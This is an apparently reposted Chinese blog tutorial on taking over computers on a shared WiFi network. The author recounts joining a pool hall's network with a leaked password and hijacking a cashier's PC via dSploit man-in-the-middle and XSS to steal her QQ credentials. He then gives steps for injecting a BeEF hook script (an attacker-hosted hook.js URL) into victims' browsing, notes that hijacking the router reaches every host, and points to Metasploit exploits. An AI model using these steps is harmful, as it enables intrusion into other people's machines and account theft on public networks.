最新消息:

强制性获取无线网内所有电脑shell

wifi admin 3148浏览 0评论

Author :Morker                        Blog : http://www.morker.net/

前言:

今年五月份去广州与兄弟玩的时候,我们去打桌球,看见收银员妹子不错哦。然后我就想试着能拿到QQ号码不。所以我想起了wifi、打开wifi、密码被万能钥匙所收录、所以我链接上去后,果断开启dSploit.因为就收银台一台电脑、我很快就看到妹子电脑的IP了、果断劫持.我想,劫持什么的好麻烦的说。想获取妹子的QQkey、于是乎我想到dSploit里的脚本注入.因为之前都玩过么,就是浏览器浏览页面的时候弹js、我想能不能试着把语句改成xss的地址、说着就做了.功夫不负有心人,果然可以哦、附图

jinglingshu_2014-07-17_09-00-35

成功打到了、、 然而最近我看到我这图的时候,就想到能不能用dSploit配合beef或者metasploit呢?想法有了,就试着做把,可惜,这两天下雨、连续两天的停电,伤不起啊、不过还是成功的实现了,我用的是dSploit配合beef

过程就看下面的图吧

jinglingshu_2014-07-17_09-00-35

这是我卡利里的beef,现在是没有主机的、

jinglingshu_2014-07-17_09-00-46

这是我虚拟机里的xp系统,IP是:192.168.1.106

接下来我们去手机界面看看

jinglingshu_2014-07-17_09-00-50

我们可以看到我们的目标IP,我们选中

jinglingshu_2014-07-17_09-00-52

选中后,我们再选择MITM

jinglingshu_2014-07-17_09-00-48

接下来就是脚本注入了

jinglingshu_2014-07-17_09-00-37

选择脚本注入,我们自定义代码、

我卡利的IP是192.168.1.105,而beef的默认端口是3000,以及木马是后面加上hook.js

也就是http://192.168.1.105:3000/hook.js

然后我们点击完成、就运行了

我们去xp系统随便打开页面,就基本中招了

jinglingshu_2014-07-17_09-01-08

如上图,随便打开,百度啊,贴吧啊什么的都行

jinglingshu_2014-07-17_09-01-10

回到卡利,神奇的事情就发生了,主机上线了,接下来我就不多说了,这里我只是做个例子,拿一台电脑做实验,如果如题所说是全部,就直接劫持路由器,在dSploit里点击路由IP就行。其他操作一样。

Beef可以本身有很多exploit,而且他可以加载metasploit的模块、

所以你可以利用目标电脑的信息进行溢出了。、、

告诉你们,beef是很强大的公牛哦、、以后手机装上卡利或者BT5,或者笔记本什么的,各种内网渗透了、、、

My Blog :http://www.morker.net/

转载请注明:jinglingshu的博客 » 强制性获取无线网内所有电脑shell


Warning: Use of undefined constant PRC - assumed 'PRC' (this will throw an Error in a future version of PHP) in /usr/share/nginx/html/wp-content/themes/d8/comments.php on line 17
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址